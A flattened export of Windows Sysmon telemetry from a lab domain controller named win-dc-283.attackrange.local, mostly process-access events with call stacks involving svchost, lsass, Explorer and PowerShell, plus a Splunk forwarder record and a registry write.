Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029461Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:11.094{7901BC46-543F-6008-BA06-00000000A301}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x800000000000000029478Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:03:20.031{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ef45-0xc58f98e0) 10341000x800000000000000029505Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029504Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029503Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029502Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029501Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029500Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029499Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029498Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029497Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029496Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029495Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029494Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029493Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029492Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029491Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029490Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029489Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029488Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029487Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029486Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029485Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029484Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029483Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029482Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029481Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029480Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029479Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:22.843{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029598Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.765{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5457-6008-BE06-00000000A301}1228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029597Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.765{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5457-6008-BE06-00000000A301}1228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029596Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.734{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5457-6008-BE06-00000000A301}1228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029595Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 